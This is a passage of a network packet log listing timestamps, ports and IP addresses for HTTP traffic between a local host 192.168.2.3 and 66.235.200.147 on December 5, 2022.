Dec 5, 2022 01:32:37.932209969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932224035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932236910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932250023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932262897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932276964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932290077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932315111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932322979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932337999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932343006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932353973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932372093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932388067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932398081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932409048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932425022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932442904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932451010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932470083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932476997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932490110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932504892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932518959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932532072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932545900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932559013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932574987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932586908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932596922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932612896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932627916 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932640076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932655096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932667017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932677031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932693958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932706118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932719946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932729006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932745934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932759047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932773113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932785034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932800055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932811022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932826042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932836056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932852030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932864904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932878971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932888985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932905912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932917118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932931900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932945967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932959080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932971001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.932986975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.932996988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933015108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933026075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933039904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933065891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933067083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933082104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933094978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933104992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933120966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933146000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933150053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933165073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933172941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933187962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933198929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933226109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933239937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933252096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933276892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933283091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933303118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933305979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933326006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933331966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933343887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933358908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933370113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933386087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933394909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933413982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933423042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933440924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933464050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933466911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933479071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933494091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933521032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933537960 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933547020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933567047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933573961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933593035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933600903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933612108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933629036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933639050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933655977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933670044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933682919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933693886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933708906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933722019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933736086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933749914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933763027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933773041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933789968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933804989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933815956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933830023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933842897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933856964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933871031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933878899 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933897018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933914900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933923006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933933973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933952093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933964014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.933978081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.933995008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934007883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934016943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934035063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934045076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934062004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934073925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934091091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934099913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934118032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934129953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934144020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934155941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934173107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934181929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934199095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934211016 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934226990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934242010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934252024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934267998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934278965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934305906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934308052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934322119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934330940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934343100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934357882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934369087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934386015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934397936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934411049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934423923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934437990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934448957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934463978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934475899 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934492111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934501886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934519053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934530973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934545040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934557915 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934571028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934582949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934597015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934608936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934623957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934637070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934653997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934660912 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934680939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934691906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934708118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934720039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934734106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934743881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934760094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934772015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934786081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934798956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934812069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934822083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934838057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934849977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934864044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934896946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934916973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934919119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934946060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934958935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934972048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.934983969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.934998035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935013056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935024023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935035944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935051918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935061932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935079098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935089111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935106993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935115099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935133934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935144901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935158968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935168982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935185909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935195923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935214043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935226917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935239077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935250998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935266018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935276031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935292006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935306072 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935317039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935328007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935343981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935353041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935372114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935381889 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935399055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935408115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935426950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935435057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935452938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935467005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935478926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935488939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935507059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935517073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935533047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935545921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935559034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935566902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935585022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935596943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935611963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935623884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935638905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935648918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935663939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935681105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935689926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935702085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935715914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935724020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935741901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935751915 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935769081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935779095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935795069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935806990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935821056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935830116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935848951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935859919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935873985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935889006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935899019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935909986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935925007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935936928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935950994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935961962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.935976982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.935986996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936002970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936016083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936029911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936039925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936058044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936067104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936084032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936096907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936110973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936120033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936146021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936156034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936171055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936187029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936197042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936208010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936223030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936234951 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936249018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936270952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936274052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936285019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936300039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936311007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936326027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936337948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936352968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936363935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936378956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936393023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936404943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936419010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936443090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936448097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936461926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936479092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936486959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936496019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936506033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936513901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936522961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936531067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936539888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936548948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936558008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936566114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936573029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936583042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936589003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936600924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.936609030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936623096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.936640978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.957602978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957639933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957669973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957700014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957730055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957746983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.957761049 CET	80	49705	66.235.200.147	192.168.2.3
